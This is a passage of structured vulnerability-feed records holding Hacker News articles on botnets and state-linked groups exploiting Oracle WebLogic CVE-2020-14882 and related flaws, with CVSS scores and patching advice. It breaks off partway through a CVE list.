"[![](https://thehackernews.com/images/-YyEQtU7LgDo/X8db6p8DO8I/AAAAAAAABIQ/utbyMZk-FiseVGq58_NSQRdh8YOzTJKVQCLcBGAsYHQ/s0/oracle-weblogic-vulnerability.jpg)](<https://thehackernews.com/images/-YyEQtU7LgDo/X8db6p8DO8I/AAAAAAAABIQ/utbyMZk-FiseVGq58_NSQRdh8YOzTJKVQCLcBGAsYHQ/s0/oracle-weblogic-vulnerability.jpg>)\n\nMultiple botnets are targeting thousands of publicly exposed and still unpatched Oracle WebLogic servers to deploy crypto miners and steal sensitive information from infected systems.\n\nThe attacks are taking aim at a recently patched WebLogic Server vulnerability, which was released by Oracle as part of its [October 2020 Critical Patch Update](<https://www.oracle.com/security-alerts/cpuoct2020.html>) and subsequently again in November ([CVE-2020-14750](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html>)) in the form of an out-of-band security patch.\n\nAs of writing, about 3,000 Oracle WebLogic servers are accessible on the Internet-based on stats from the Shodan search engine.\n\nOracle [WebLogic](<https://www.oracle.com/java/weblogic/>) is a platform for developing, deploying, and running enterprise Java applications in any cloud environment as well as on-premises.\n\nThe flaw, which is tracked as CVE-2020-14882, has a CVSS score of 9.8 out of a maximum rating of 10 and affects WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0.\n\nAlthough the issue has been addressed, the release of [proof-of-concept](<https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf>) [exploit code](<https://twitter.com/GossiTheDog/status/1321430443611328513>) has made vulnerable Oracle WebLogic instances a lucrative target for threat actors to recruit these servers into a botnet that pilfers critical data and deploy second stage malware payloads.\n\n[![](https://thehackernews.com/images/-wm9J_0qaQqg/X8da9GN12sI/AAAAAAAABIE/yRTwD1rPMOI7fCldegCFe1t__JlVmOxmwCLcBGAsYHQ/s0/shodan.jpg)](<https://thehackernews.com/images/-wm9J_0qaQqg/X8da9GN12sI/AAAAAAAABIE/yRTwD1rPMOI7fCldegCFe1t__JlVmOxmwCLcBGAsYHQ/s0/shodan.jpg>)\n\nAccording to [Juniper Threat Labs](<https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability>), operators of the DarkIRC botnet are exploiting this RCE vulnerability to spread laterally across the network, download files, record keystrokes, steal credentials, and execute arbitrary commands on compromised machines.\n\nThe malware also acts as a Bitcoin clipper that allows them to change bitcoin wallet addresses copied to the clipboard to the operator's bitcoin wallet address, allowing the attackers to reroute Bitcoin transactions.\n\nWhat's more, a threat actor by the name of \"Freak_OG\" has been selling the DarkIRC malware currently on hacking forums for $75 since August.\n\nBut it's not just DarkIRC that's exploiting the WebLogic Server vulnerability. In a separate campaign\u2014spotted by '[0xrb](<https://twitter.com/0xrb>)' and detailed by researcher [Tolijan Trajanovski](<https://tolisec.com/multi-vector-minertsunami-botnet-with-ssh-lateral-movement/>)\u2014evidence has emerged of a botnet that propagates via the WebLogic flaw to deliver Monero cryptocurrency miner and [Tsunami](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami>) binaries.\n\nBesides using SSH for lateral movement, the botnet has been found to achieve persistence through cron jobs, kill competing mining tools, and even uninstall Endpoint detection and response (EDR) tools from Alibaba and Tencent.\n\nIt's recommended that users apply the October 2020 Critical Patch Update and the updates associated with CVE-2020-14750 as soon as possible to mitigate risks stemming from this flaw.\n\nOracle has also provided instructions to [harden the servers](<https://docs.oracle.com/en/middleware/standalone/weblogic-server/14.1.1.0/lockd/secure.html#GUID-8C0CC8CF-3D16-4DC1-BF54-1C1B17D2CEF8>) by preventing external access to internal applications accessible on the Administration port.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T09:20:00", "type": "thn", "title": "Multiple Botnets Exploiting Critical Oracle WebLogic Bug \u2014 PATCH NOW", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-12-02T09:20:45", "id": "THN:8ECDF261632B04DEE688C1023DD73404", "href": "https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:17", "description": "[![](https://thehackernews.com/images/-0qCTVNBbagI/YUmu3sDCBAI/AAAAAAAAD1k/k2oakh_7XAY6Wn7t1L57tvpGWxcFEF7iACLcBGAsYHQ/s0/php-malware.gif)](<https://thehackernews.com/images/-0qCTVNBbagI/YUmu3sDCBAI/AAAAAAAAD1k/k2oakh_7XAY6Wn7t1L57tvpGWxcFEF7iACLcBGAsYHQ/s0/php-malware.gif>)\n\nA recently discovered wave of malware attacks has been spotted using a variety of tactics to enslave susceptible machines with easy-to-guess administrative credentials to co-opt them into a network with the goal of illegally mining cryptocurrency.\n\n\"The malware's primary tactic is to spread by taking advantage of vulnerable systems and weak administrative credentials. Once they've been infected, these systems are then used to mine cryptocurrency,\" Akamai security researcher Larry Cashdollar [said](<https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread>) in a write-up published last week.\n\nThe PHP malware \u2014 codenamed \"Capoae\" (short for \"\u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435,\" the Russian word for \"Scanning\") \u2014 is said to be delivered to the hosts via a backdoored addition to a WordPress plugin called \"download-monitor,\" which gets installed after successfully brute-forcing WordPress admin credentials. The attacks also involve the deployment of a [Golang binary](<https://www.virustotal.com/gui/file/7d1e2685b0971497d75cbc4d4dac7dc104e83b20c2df8615cf5b008dd37caee0/detection>) with decryption functionality, with the obfuscated payloads retrieved by leveraging the trojanized plugin to make a GET request from an actor-controlled domain.\n\n[![](https://thehackernews.com/images/-wFLrozAbkbI/YUmtp8WYEJI/AAAAAAAAD1c/NGDuAVPUzDcFWdqor6HQHxg5W4I9mYwEQCLcBGAsYHQ/s0/shell.jpg)](<https://thehackernews.com/images/-wFLrozAbkbI/YUmtp8WYEJI/AAAAAAAAD1c/NGDuAVPUzDcFWdqor6HQHxg5W4I9mYwEQCLcBGAsYHQ/s0/shell.jpg>)\n\nAlso included is a feature to decrypted and execute additional payloads, while the Golang binary takes advantage of exploits for multiple remote code execution flaws in Oracle WebLogic Server ([CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>)), NoneCms ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), and Jenkins ([CVE-2019-1003029](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003029>) and [CVE-2019-1003030](<https://nvd.nist.gov/vuln/detail/CVE-2019-1003030>)) to brute force its way into systems running SSH and ultimately launch the XMRig mining software.\n\nWhat's more, the attack chain stands out for its persistence tricks, which includes choosing a legitimate-looking system path on the disk where system binaries are likely to be found as well as generating a random six-character filename that's then subsequently used to copy itself into the new location on the system before deleting the malware upon execution.\n\n\"The Capoae campaign's use of multiple vulnerabilities and tactics highlights just how intent these operators are on getting a foothold on as many machines as possible,\" Cashdollar said. \"The good news is, the same techniques we recommend for most organizations to keep systems and networks secure still apply here.\"\n\n\"Don't use weak or default credentials for servers or deployed applications,\" Cashdollar added. \"Ensure you're keeping those deployed applications up to date with the latest security patches and check in on them from time to time. Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts and suspicious access log entries, etc., will help you potentially identify compromised machines.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-21T10:08:00", "type": "thn", "title": "New Capoae Malware Infiltrates WordPress Sites and Installs Backdoored Plugin", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20062", "CVE-2019-1003029", "CVE-2019-1003030", "CVE-2020-14882"], "modified": "2021-09-21T10:08:05", "id": "THN:B36CB9AC96CE2C515157963E75E4AC6A", "href": "https://thehackernews.com/2021/09/new-capoae-malware-infiltrates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[![Russian Spy Hackers](https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s728-e1000/hacker.jpg)](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T11:13:06", "description": "[![Ransomware Attackers](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEir4L0zsDJ9D5U4kME3FrbnUk5EFegKpTfUDGGS-jG-6WSfCd3IMiQWXApu0SvJg77AGeoxqfEAXOxrUNRyspVtEN5TxK3USDIqoYAff5WtDlquTcdsN1SeJXEljaMZkqSFZDSyb0uppqN2gRYb8FI7PAVV5-dWNfycSd656GJZcTXBvOhZlgMqkZ0vBE_1/s728-e365/malware-attack.jpg>)\n\nA financially motivated threat actor has been outed as an **initial access broker** (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware.\n\nSecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group [Gold Melody](<https://www.secureworks.com/research/threat-profiles/gold-melody>), which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant).\n\n\"This financially motivated group has been active since at least 2017, compromising organizations by exploiting vulnerabilities in unpatched internet-facing servers,\" the cybersecurity company [said](<https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker>).\n\n\"The victimology suggests opportunistic attacks for financial gain rather than a targeted campaign conducted by a state-sponsored threat group for espionage, destruction, or disruption.\"\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/o6a5Vxgy> \"Cybersecurity\" )\n\nGold Melody has been [previously](<https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/>) [linked](<https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/>) to [attacks](<https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation>) exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers.\n\nThe cybercrime group has been observed expanding its victimology footprint to strike retail, health care, energy, financial transactions, and high-tech organizations in North America, Northern Europe, and Western Asia as of mid-2020.\n\nMandiant, in an analysis published in March 2023, said that \"in multiple instances, UNC961 intrusion activity has preceded the deployment of Maze and Egregor ransomware from distinct follow-on actors.\"\n\nIt further [described](<https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated>) the group as \"resourceful in their opportunistic angle to initial access operations\" and noted it \"employs a cost-effective approach to achieve initial access by exploiting recently disclosed vulnerabilities using publicly available exploit code.\"\n\nBesides relying on a diverse arsenal comprising web shells, built-in operating system software, and publicly available utilities, it's known to employ proprietary remote access trojans (RATs) and tunneling tools such as GOTROJ (aka MUTEPUT), BARNWORK, HOLEDOOR, DARKDOOR, AUDITUNNEL, HOLEPUNCH, LIGHTBUNNY, and HOLERUN to execute arbitrary commands, gather system information, and establish a reverse tunnel with a hard-coded IP address.\n\nSecureworks, which linked Gold Melody to five intrusions between July 2020 and July 2022, said these attacks entailed the abuse of a different set of flaws, including those impacting Oracle E-Business Suite ([CVE-2016-0545](<https://nvd.nist.gov/vuln/detail/CVE-2016-0545>)), Apache Struts ([CVE-2017-5638](<https://www.synopsys.com/blogs/software-security/cve-2017-5638-apache-struts-vulnerability-explained.html>)), Sitecore XP ([CVE-2021-42237](<https://blog.assetnote.io/2021/11/02/sitecore-rce/>)), and Flexera FlexNet ([CVE-2021-4104](<https://thehackernews.com/2021/12/new-local-attack-vector-expands-attack.html>)) to obtain initial access.\n\nUPCOMING WEBINAR\n\n[Level-Up SaaS Security: A Comprehensive Guide to ITDR and SSPM\n\n](<https://thehacker.news/itdr-saas?source=inside>)\n\nStay ahead with actionable insights on how ITDR identifies and mitigates threats. Learn about the indispensable role of SSPM in ensuring your identity remains unbreachable.\n\n[Supercharge Your Skills](<https://thehacker.news/itdr-saas?source=inside>)\n\nA successful foothold is succeeded by the deployment of web shells for persistence, followed by creating directories in the compromised host to stage the tools used in the infection chain.\n\n\"Gold Melody conducts a considerable amount of scanning to understand a victim's environment,\" the company said. \"Scanning begins shortly after gaining access but is repeated and continued throughout the intrusion.\"\n\nThe reconnaissance phase paves the way for credential harvesting, lateral movement, and data exfiltration. That said, all five attacks ultimately proved to be unsuccessful.\n\n\"Gold Melody acts as a financially motivated IAB, selling access to other threat actors,\" the company concluded. \"The buyers subsequently monetize the access, likely through extortion via ransomware deployment.\"\n\n\"Its reliance on exploiting vulnerabilities in unpatched internet-facing servers for access reinforces the importance of robust patch management.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-09-21T09:11:00", "type": "thn", "title": "Cyber Group 'Gold Melody' Selling Compromised Access to Ransomware Attackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0545", "CVE-2017-5638", "CVE-2017-7504", "CVE-2019-19781", "CVE-2020-14750", "CVE-2020-14882", "CVE-2021-22205", "CVE-2021-22941", "CVE-2021-26084", "CVE-2021-35464", "CVE-2021-4104", "CVE-2021-42237", "CVE-2021-44228"], "modified": "2023-09-21T09:11:14", "id": "THN:3E5F28AD1BE3C9B2442EA318E6E13E5C", "href": "https://thehackernews.com/2023/09/cyber-group-gold-melody-selling.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[![Critical Infrastructure](https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", 